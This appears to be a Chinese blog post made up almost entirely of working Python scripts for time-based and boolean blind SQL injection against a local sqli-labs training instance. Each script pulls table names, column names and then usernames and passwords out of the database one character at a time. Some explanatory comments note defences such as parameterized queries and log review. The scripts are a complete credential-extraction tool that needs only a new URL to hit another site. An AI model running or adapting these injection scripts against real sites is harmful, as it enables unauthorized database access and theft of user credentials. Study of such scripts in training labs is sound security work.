时间盲注,boolean盲注,获取表、列、具体数据的函数
- IT业界
- 2025-08-28 15:03:02

时间盲注:
获取表:
import requests
import time

# Target is a local sqli-labs training instance (Less-9, time-based blind).
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
# Seconds handed to SLEEP() inside the payload; also the timing threshold below.
delay = 2


def is_injected(payload):
    """Return True when the injected condition appears to hold.

    The result is inferred from response time alone: a request that raises
    requests' Timeout (timeout is delay + 1 s) or that takes longer than
    `delay` seconds counts as "true". Any other source of latency (a slow
    server, network jitter) therefore yields a false positive.
    Reads the module globals `url` and `delay`.
    """
    start = time.time()
    try:
        # The payload is spliced into the `id` parameter after a closing quote
        # and "-- " comments out the rest of the lab's query. This presumably
        # works only because the lab concatenates `id` into its SQL string; a
        # parameterized query would leave the same input inert.
        requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay+1)
    except requests.exceptions.Timeout:
        return True
    return time.time() - start > delay


# Recovers the first table name of the current schema one character at a
# time: up to 29 positions x 95 printable-ASCII candidates, one request per
# candidate. On the server this appears as a burst of near-identical GETs
# whose `id` parameter contains IF(...SLEEP(...)) and differs only in the
# compared byte — the pattern an access-log review or WAF rule keys on.
table = []
for pos in range(1, 30):
    for c in range(32, 127):
        payload = f"IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"
        if is_injected(payload):
            table.append(chr(c))
            print("".join(table))
            break
    else:
        # for/else: no candidate matched at this position, which is taken to
        # mean the end of the name. A byte outside 32..126 or a missed timing
        # check ends the loop the same way, leaving a truncated result.
        break
print("".join(table))
获取列:
import requests
import time

# Target is a local sqli-labs training instance (Less-9, time-based blind).
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
# Seconds handed to SLEEP() inside the payload; also the timing threshold below.
delay = 2
# Table whose first column name is recovered by the loop below.
table_name = "emails"


def is_injected(payload):
    """Return True when the injected condition appears to hold.

    The result is inferred from response time alone: a request that raises
    requests' Timeout (timeout is delay + 1 s) or that takes longer than
    `delay` seconds counts as "true". Any other source of latency (a slow
    server, network jitter) therefore yields a false positive.
    Reads the module globals `url` and `delay`.
    """
    start = time.time()
    try:
        # The payload is spliced into the `id` parameter after a closing quote
        # and "-- " comments out the rest of the lab's query. This presumably
        # works only because the lab concatenates `id` into its SQL string; a
        # parameterized query would leave the same input inert.
        requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)
    except requests.exceptions.Timeout:
        return True
    return time.time() - start > delay


# Same scheme as the table script: up to 29 positions x 95 candidates, one
# request each, so the per-character cost and the log footprint
# (IF(...SLEEP(...)) in `id`, differing only in the compared byte) are the same.
column = []
for pos in range(1, 30):
    for c in range(32, 127):
        payload = f"IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"
        if is_injected(payload):
            column.append(chr(c))
            print("".join(column))
            break
    else:
        # for/else: no candidate matched, taken as end of the name (or a byte
        # outside 32..126 / a missed timing check — the result is then truncated).
        break
print(''.join(column))
获取具体数据:
import requests
import time

# Target is a local sqli-labs training instance (Less-9, time-based blind).
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
# Seconds handed to SLEEP() inside the payload; also the timing threshold below.
delay = 2
# NOTE(review): the pasted source had a stray '#' in front of this assignment;
# the query below references table_name, so it is kept as code here. If it is
# really meant to be commented out, the first f-string raises NameError.
table_name = "emails"
column_name = "id"


def is_injected(payload):
    """Return True when the injected condition appears to hold.

    The result is inferred from response time alone: a request that raises
    requests' Timeout (timeout is delay + 1 s) or that takes longer than
    `delay` seconds counts as "true". Any other source of latency (a slow
    server, network jitter) therefore yields a false positive.
    Reads the module globals `url` and `delay`.
    """
    start = time.time()
    try:
        # The payload is spliced into the `id` parameter after a closing quote
        # and "-- " comments out the rest of the lab's query. This presumably
        # works only because the lab concatenates `id` into its SQL string; a
        # parameterized query would leave the same input inert.
        requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)
    except requests.exceptions.Timeout:
        return True
    return time.time() - start > delay


# Recovers the first value of column_name in table_name: up to 49 positions x
# 95 candidates, one request each. Both names are interpolated unquoted into
# the SELECT, so they are trusted to be plain identifiers.
data = []
for pos in range(1, 50):
    for c in range(32, 127):
        payload = f"IF(ASCII(SUBSTR((SELECT {column_name} FROM {table_name} LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"
        if is_injected(payload):
            data.append(chr(c))
            print("".join(data))
            break
    else:
        # for/else: no candidate matched, taken as end of the value (or a byte
        # outside 32..126 / a missed timing check — the result is then truncated).
        break
print(''.join(data))
boolen盲注:
获取表:
import requests

# Target is a local sqli-labs training instance (Less-8, boolean-based blind).
# The closing quote (%27) is already part of the URL; the payload is appended
# to the query string verbatim, so it carries its own %20 encoding.
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
# {t}: LIMIT offset (which table), {w}: character position, {A}: candidate code.
payload = 'and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=' \
          'database()%20limit%20{t},1),{w},1))={A}%20--%20k'
# Candidate character codes, tried in this order. 173, 175 and 176 are above
# 127, so chr() yields non-ASCII characters for them.
list1 = [64, 94, 96, 124, 176, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 173, 175, 95, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 44]
# The lab prints this banner when its WHERE clause is true; whether the bytes
# appear in the response body is the single bit each request yields.
str1 = "You are in..........."
str2 = bytes(str1, 'utf-8')
tables1 = ''
tables2 = ''
tables3 = ''
tables4 = ''
# Up to 4 table names (offsets 0..3), up to 9 characters each, one request per
# candidate. A position with no matching candidate is silently skipped rather
# than ending the name, so a character missing from list1 leaves a gap.
for i in range(0, 4):
    for j in range(1, 10):
        for s in list1:
            p = payload.format(t=i, w=j, A=s)
            # No timeout is passed, so a stalled connection blocks the script.
            u = requests.get(url+p)
            if str2 in u.content:
                # One accumulator per offset; the branches differ only in the
                # variable updated and the index printed.
                if i == 0:
                    tables1 += chr(s)
                    print (u"正在对比第1个表,", u"第", j, u"个字符",tables1)
                elif i == 1:
                    tables2 += chr(s)
                    print (u"正在对比第2个表,", u"第", j, u"个字符", tables2)
                elif i == 2:
                    tables3 += chr(s)
                    print (u"正在对比第3个表,", u"第", j, u"个字符", tables3)
                elif i == 3:
                    tables4 += chr(s)
                    print (u"正在对比第4个表,", u"第", j, u"个字符", tables4)
                break
print ('tables1-->', tables1)
print ('tables2-->', tables2)
print ('tables3-->', tables3)
print ('tables4-->', tables4)
获取列:
import requests

# Candidate characters for each position, tried in this order.
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '.']
# Local sqli-labs training instance (Less-8, boolean-based blind); the closing
# quote is already in the URL and the payload is appended verbatim.
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
# Prefix comparison: left(column_name, {n}) against the prefix recovered so
# far plus one candidate ({c}). Schema 'security' and table 'users' are the
# sqli-labs defaults and are hard-coded. {w}: LIMIT offset (which column).
payload = '%20and%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security' \
          '%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--%20k'
# Five slots are allocated but the loop below only fills the first three
# (range(0, 3)), so column 4 and column 5 are always printed empty.
column = ['', '', '', '', '']
# The lab's "true" banner; its presence in the body is the one bit per request.
str1 = 'You are in...........'
str2 = bytes(str1, 'utf-8')
# Up to 8 characters per column, one request per candidate. Because each
# guess compares a prefix of length i, a single miss leaves column[j] too
# short for every later comparison to match, so the value ends there.
for j in range(0, 3):
    for i in range(1, 9):
        for l in list1:
            p = payload.format(w=j, n=i, c=column[j]+l)
            # No timeout is passed, so a stalled connection blocks the script.
            u = requests.get(url+p)
            if str2 in u.content:
                column[j] += l
                print (u'正在对比第', j+1, u'个字段第', i, u'个字符', column[j])
                break
for c in range(0, 5):
    print ('column', c+1, '-->', column[c])
获取具体数据:
import requests

# Candidate characters for each position, tried in this order.
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '.']
# Local sqli-labs training instance (Less-8, boolean-based blind); the closing
# quote is already in the URL and the payload is appended verbatim.
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
# Prefix comparison on users.username for row id {n}: left(username, {w})
# against the prefix recovered so far plus one candidate ({d}).
payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
# The lab's "true" banner; its presence in the body is the one bit per request.
str1 = 'You are in...........'
str2 = bytes(str1, 'utf-8')
# One accumulator per row id 1..14 (index id-1).
username = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
password = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
# Rows 1..14, up to 10 characters each, one request per candidate. There is no
# break after a match, so the remaining candidates for that position are still
# sent; they cannot match because the prefix is now one character longer than
# left() returns, so this only costs extra requests. As with the column
# script, a single miss leaves the prefix too short for later positions.
for i in range(1, 15):
    for j in range(1, 11):
        for l in list1:
            p = payload.format(n=i, w=j, d=username[i-1]+l)
            # No timeout is passed, so a stalled connection blocks the script.
            u = requests.get(url+p)
            if str2 in u.content:
                username[i-1] += l
                print (u'正在对比第', i, u'个记录的username的第', j, u'个字符', username[i-1])
# Same procedure against users.password.
payload2 = '%20and%20left((select%20password%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
for i in range(1, 15):
    for j in range(1, 11):
        for l in list1:
            p = payload2.format(n=i, w=j, d=password[i-1]+l)
            u = requests.get(url+p)
            if str2 in u.content:
                password[i-1] += l
                print (u'正在对比第', i, u'个记录的password的第', j, u'个字符', password[i-1])
# Final table: row id, recovered username, recovered password.
print ('id username password')
for i in range(1, 15):
    print (i, '-', username[i-1], '-', password[i-1])